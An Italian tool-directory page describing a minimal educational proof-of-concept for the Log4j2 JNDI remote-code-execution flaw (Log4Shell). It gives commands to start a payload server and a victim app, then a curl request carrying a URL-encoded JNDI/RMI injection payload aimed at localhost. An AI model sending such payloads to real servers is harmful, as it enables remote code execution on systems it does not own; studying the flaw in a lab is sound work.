Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
log4j2-rce-poc — Un proof-of-concept minimale per la vulnerabilità RCE JNDI di Log4j2 (CVE-2021-44228/Log4Shell). | Kitploit
Strumenti/GitHubGitHub/unlimitedsola/log4j2-rce-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneStrumento di Accesso Remoto
GitHubunlimitedsola/log4j2-rce-poc

log4j2-rce-poc

Un proof-of-concept minimale per la vulnerabilità RCE JNDI di Log4j2 (CVE-2021-44228/Log4Shell).

Vedi Repository
324 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

POC della vulnerabilità RCE di Log4j2

Un proof-of-concept minimale per la vulnerabilità di Remote-Code-Execution JNDI di Log4j2 (CVE-2021-44228). È pensato a scopo educativo per aiutare chi non è un ricercatore di sicurezza a capire come funziona e quanto sia grande l'impatto.

Il POC aggira il requisito di impostare le proprietà com.sun.jndi.rmi.object.trustURLCodebase e com.sun.jndi.cosnaming.object.trustURLCodebase a true che sono state disabilitate per impostazione predefinita a partire da 8u121, 7u131, 6u141 .

Prerequisiti

  • JDK 1.8

Nota: JDK 1.8 è necessario per compilare payload-server, ma victim-app è vulnerabile fino a JDK 15 perché il motore Nashorn è stato rimosso in JDK 15.

Come testare

  1. Avvia il payload-server eseguendo:
root@kitploit:~
$ ./gradlew runPayloadServer
  1. Apri una nuova sessione di terminale, quindi avvia victim-app:
root@kitploit:~
$ ./gradlew runVictimApp
  1. Esegui curl http://localhost:8080/hello?name=%24%7Bjndi%3Armi%3A%2F%2F127.0.0.1%3A8099%2Fexec%7D per attivare la RCE.
  2. Per verificare che il codice remoto sia stato eseguito, controlla il log della console di victim-app. Dovresti vedere un log inatteso stampato sullo schermo.
Scarica lo strumento